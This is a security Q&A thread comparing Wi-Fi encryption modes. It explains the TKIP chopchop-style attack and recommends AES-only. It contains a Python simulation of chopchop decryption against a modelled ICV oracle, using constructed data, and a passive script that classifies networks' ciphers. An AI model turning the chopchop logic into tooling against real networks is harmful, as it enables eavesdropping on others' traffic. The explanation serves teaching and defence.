
On this forum thread I see (translated):

On the Telecom router we have these Wi-Fi encryption modes:

- Disabled -> Open network

- WEP (128 bit) -> WEP (unsafe, breakable in a few minutes)

- WPA-PSK TKIP 256 bit -> WPA (unsafe, breakable in a few hours)

- WPA-PSK AES 256 bit -> WPA2 (safe)

- WPA-PSK TKIP-AES 256 bit -> WPA\WPA2 (unsafe)

Is WPA-PSK AES safer than WPA-PSK TKIP-AES? Is WPA-PSK TKIP-AES dangerous for security?

schroeder
elbarna

2 Answers


TKIP is vulnerable to an attack similar to the WEP "ChopChop" attack.

TKIP uses a MIC to guarantee the integrity of an encrypted frame. If more than two MIC failures are observed in a 60 second window, both the Access Point (AP) and the client station shut down for 60 seconds. The newer TKIP attack uses a mechanism similar to the "chopchop" WEP attack to decode one byte at a time by using multiple replays and observing the response over the air. When a MIC failure occurs, the attacker observes the response and waits 60 seconds to avoid the MIC countermeasures. Using this mechanism, the attacker can decode a packet at a rate of one byte per minute. Small packets like ARP frames can typically be decoded in about 15 minutes by leveraging this exploit.

TKIP also includes a sequence counter that can detect whether a packet is being sent out of sequence. However, with the introduction of QoS based on the WMM standard, sequence enforcement across multiple QoS queues was relaxed for performance reasons. This creates another security flaw. Once a TKIP frame has been decoded, the attacker can use the obtained key sequence to inject up to 15 additional arbitrary frames using different QoS queues without triggering a sequence number violation that would have led to the injected packets being dropped.

Summary of TKIP Vulnerabilities

  1. This is not a key recovery attack. TKIP keys are not compromised and it does not lead to decryption of all subsequent frames.

  2. The attack affects all TKIP deployments (WPA and WPA2) regardless of whether they use Pre-Shared Keys (PSK) or the more robust enterprise mode with 802.1X authentication.

  3. The attack can reveal one byte per minute of a TKIP encrypted packet. Small frames like ARPs are good candidates for the attack.

  4. If QoS is enabled, the attack can also lead to injection of up to 15 arbitrary frames for every decrypted packet. Potential attack scenarios include ARP decoding followed by ARP poisoning, DNS manipulation, etc.

  5. WPA and WPA2 networks that use the more robust AES-CCMP encryption algorithm are immune to the attack.

  6. The attack is capable of decrypting a TKIP frame sent from an AP to a station (not station to AP).
Yokai
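The byte-per-minute figure in the answer above follows directly from how chopchop works against a CRC-32 ICV plus the Michael countermeasure wait. The following is an added example written for this page, not code from the answer or from any real attack tool: it models a frame as plaintext || CRC-32 ICV XORed with a per-packet keystream, a receiver that leaks whether the ICV checked out (in TKIP that leak is the MIC-failure report a station sends once the ICV has passed), and an attacker that chops the last byte, guesses it, repairs the ICV with a correction that depends only on the guess (CRC-32 is linear), and waits 60 s after every accepted probe. The keystream, payload and frame layout are constructed; the 60 s wait and 1 ms per probe are assumed timings for the simulation.

```python
"""Chopchop-style decryption of a CRC-32-protected frame tail via an ICV oracle.

Added example for this page, not the answer's or any tool's code. Frame body is
plaintext || CRC-32 ICV, XORed with an unknown per-packet keystream. Because
CRC-32 is linear, chopping the last byte and guessing its value lets the
attacker repair the ICV with a correction that depends only on the guess; the
receiver's ICV verdict (the MIC-failure report, in TKIP) confirms the guess.
All inputs below are constructed, not captured.
"""
import struct
import zlib

POLY = 0xEDB88320  # reflected CRC-32 polynomial (IEEE 802.3), used for the ICV
MASK = 0xFFFFFFFF

# Byte-wise CRC table and its inverse keyed by top byte. The top bytes of the
# table entries are a permutation of 0..255, which makes the register reversible.
TABLE = []
for i in range(256):
    r = i
    for _ in range(8):
        r = (r >> 1) ^ (POLY if r & 1 else 0)
    TABLE.append(r)
INV_TOP = {t >> 24: i for i, t in enumerate(TABLE)}


def reg_step(reg, byte):
    return (reg >> 8) ^ TABLE[(reg ^ byte) & 0xFF]


def reg_after(data, init):
    reg = init
    for b in data:
        reg = reg_step(reg, b)
    return reg


# Register state every well-formed frame (data || ICV) ends in. It is a constant
# of the CRC, so derive it from the empty frame instead of hard-coding it.
VALID_REG = reg_after(struct.pack("<I", zlib.crc32(b"")), 0xFFFFFFFF)


def force_tail(target_reg):
    """Four bytes that take a zero register to target_reg: walk back picking
    table indices by top byte, then walk forward turning indices into bytes."""
    idx, reg = [0] * 4, target_reg
    for i in (3, 2, 1, 0):
        idx[i] = INV_TOP[reg >> 24]
        reg = ((reg ^ TABLE[idx[i]]) << 8) & MASK
    out, reg = bytearray(), 0
    for i in range(4):
        out.append(idx[i] ^ (reg & 0xFF))
        reg = reg_step(reg, out[-1])
    return bytes(out)


def chop_correction(guess):
    """XOR patch for the last 4 bytes of a valid frame whose final byte (value
    `guess`) was cut off, making the shortened frame valid again. It depends
    only on `guess`, which is what makes chopchop work without the key."""
    i = INV_TOP[VALID_REG >> 24]
    before_last = (((VALID_REG ^ TABLE[i]) << 8) & MASK) | (i ^ guess)
    return force_tail(before_last ^ VALID_REG)


def xor_tail(frame, patch):
    n = len(patch)
    return frame[:-n] + bytes(a ^ b for a, b in zip(frame[-n:], patch))


def make_station(keystream):
    """Receiver model: decrypt, check the ICV. True stands for the observable
    MIC-failure report (ICV fine, Michael MIC wrong); False for a silent drop."""
    def receive(frame):
        plain = bytes(c ^ k for c, k in zip(frame, keystream))
        return zlib.crc32(plain[:-4]) == struct.unpack("<I", plain[-4:])[0]
    return receive


def chopchop(frame, oracle, nbytes):
    """Recover the last `nbytes` keystream bytes of `frame`, one byte at a time
    from the end. Returns (keystream_tail, simulated_seconds)."""
    current, keystream, seconds = frame, bytearray(), 0.0
    for _ in range(nbytes):
        chopped = current[:-1]
        for guess in range(256):
            candidate = xor_tail(chopped, chop_correction(guess))
            seconds += 0.001                       # one probe on the air (assumed)
            if oracle(candidate):
                keystream.insert(0, current[-1] ^ guess)
                seconds += 60.0                    # sit out the countermeasure window
                current = candidate
                break
        else:
            raise RuntimeError("no guess accepted: oracle is not an ICV oracle")
    return bytes(keystream), seconds


def demo(nbytes=12):
    # Constructed ARP-over-SNAP-looking payload and an arbitrary keystream.
    payload = bytes.fromhex("aaaa0300000008060001080006040001") + bytes(range(18))
    body = payload + struct.pack("<I", zlib.crc32(payload))
    keystream = bytes((i * 73 + 41) & 0xFF for i in range(len(body)))
    frame = bytes(p ^ k for p, k in zip(body, keystream))
    ks_tail, seconds = chopchop(frame, make_station(keystream), nbytes)
    recovered = bytes(c ^ k for c, k in zip(frame[-nbytes:], ks_tail))
    return recovered, body[-nbytes:], seconds


if __name__ == "__main__":
    got, want, secs = demo()
    print(got.hex(), got == want, f"{secs / 60:.1f} min")
```

Running `demo()` recovers the last 12 bytes of the frame (the 4-byte ICV and 8 bytes of payload) in a little over 12 simulated minutes, one countermeasure window per byte, with the keystream never revealed beyond the bytes recovered; that is the "not a key recovery attack" point in the summary. A receiver using AES-CCMP gives no such per-frame verdict, which is why the CCMP-only mode is not affected.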

As described, the disadvantage of allowing TKIP (also known as WPA) is that there is a known weakness. AES (used in WPA2) is more robust. Setting it to a mode that allows both will let older devices that don't support WPA2 connect in WPA mode, while devices that do support WPA2 will use that instead. Setting it to AES only comes at the price of rejecting any clients that support just WPA.

The ultimate security risk is that an older device will connect, its traffic will be intercepted and used to determine the encryption key, and the attacker can then eavesdrop on the activity.

Jeff Meden
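The question names the router's modes by their menu labels; what actually matters is which cipher suites the access point advertises, and a Linux client can read those off `iw dev <interface> scan` without access to the router. The following is an added check written for this page, not code from the thread or from the `iw` project: it parses the WPA and RSN (WPA2) information-element dump that `iw` prints and classifies each network as AES-CCMP only, TKIP only, or TKIP/CCMP mixed. It also reports the group cipher, a point the question does not raise: in mixed mode the group (broadcast) cipher has to be one every client supports, so it is TKIP, and broadcast traffic such as ARP is TKIP-protected even for the WPA2 clients. The scan text is constructed in the layout `iw` prints (indentation shown with spaces); SSIDs and BSSIDs are made up.

```python
"""Classify nearby networks' cipher suites from `iw dev <if> scan` output.

Added example for this page, not from the thread or the iw project. Parses the
WPA and RSN information-element dump iw prints and maps each BSS to the modes
listed in the question. SAMPLE_SCAN is constructed, not a real capture.
"""
import re
import sys

SAMPLE_SCAN = """\
BSS 02:00:00:00:01:00(on wlan0)
    SSID: Telecom-Mixed
    WPA:     * Version: 1
         * Group cipher: TKIP
         * Pairwise ciphers: TKIP CCMP
         * Authentication suites: PSK
    RSN:     * Version: 1
         * Group cipher: TKIP
         * Pairwise ciphers: TKIP CCMP
         * Authentication suites: PSK
BSS 02:00:00:00:02:00(on wlan0)
    SSID: Telecom-AES
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: PSK
BSS 02:00:00:00:03:00(on wlan0)
    SSID: Telecom-TKIP
    WPA:     * Version: 1
         * Group cipher: TKIP
         * Pairwise ciphers: TKIP
         * Authentication suites: PSK
"""

BSS_RE = re.compile(r"^BSS ([0-9a-fA-F:]{17})", re.M)
SSID_RE = re.compile(r"^[ \t]*SSID: (.*)$", re.M)
GROUP_RE = re.compile(r"\* Group cipher: (\S+)")
PAIR_RE = re.compile(r"\* Pairwise ciphers: (.+)$", re.M)


def classify(pairwise, group):
    """Map advertised cipher suites to the router modes named in the question."""
    if not pairwise:
        return "open or WEP: no WPA/RSN element advertised"
    if pairwise == {"CCMP"} and group == {"CCMP"}:
        return "WPA2 AES-CCMP only: not affected by the TKIP attack"
    if "CCMP" in pairwise and "TKIP" in pairwise:
        if "TKIP" in group:
            note = "group cipher TKIP, so broadcast/ARP traffic is TKIP even for WPA2 clients"
        else:
            note = "group cipher " + "/".join(sorted(group))
        return "WPA/WPA2 mixed: TKIP offered to clients; " + note
    if pairwise == {"TKIP"}:
        return "WPA TKIP only: vulnerable to the TKIP attack"
    return "unusual cipher set: " + " ".join(sorted(pairwise))


def parse_scan(text):
    """Return {ssid: (pairwise_ciphers, group_ciphers, verdict)} per BSS.

    Cipher names are collected across both the WPA and the RSN element, since a
    mixed-mode AP advertises TKIP in either or both."""
    result = {}
    starts = [m.start() for m in BSS_RE.finditer(text)] + [len(text)]
    for a, b in zip(starts, starts[1:]):
        block = text[a:b]
        m = SSID_RE.search(block)
        ssid = m.group(1).strip() if m else BSS_RE.match(block).group(1)
        pairwise = {c for line in PAIR_RE.findall(block) for c in line.split()}
        group = set(GROUP_RE.findall(block))
        result[ssid] = (pairwise, group, classify(pairwise, group))
    return result


if __name__ == "__main__":
    # Usage: iw dev wlan0 scan | python3 this_script.py   (falls back to the sample)
    text = SAMPLE_SCAN if sys.stdin.isatty() else sys.stdin.read()
    for ssid, (_, _, verdict) in parse_scan(text).items():
        print(f"{ssid}: {verdict}")
```

On the sample, `Telecom-AES` is the only network whose every cipher is CCMP; `Telecom-Mixed` offers TKIP alongside CCMP with a TKIP group cipher, which is the "WPA\WPA2" mode the question marks unsafe, and `Telecom-TKIP` is the WPA-only mode. Scanning requires a wireless interface and usually root; it is passive and does not touch the router's configuration.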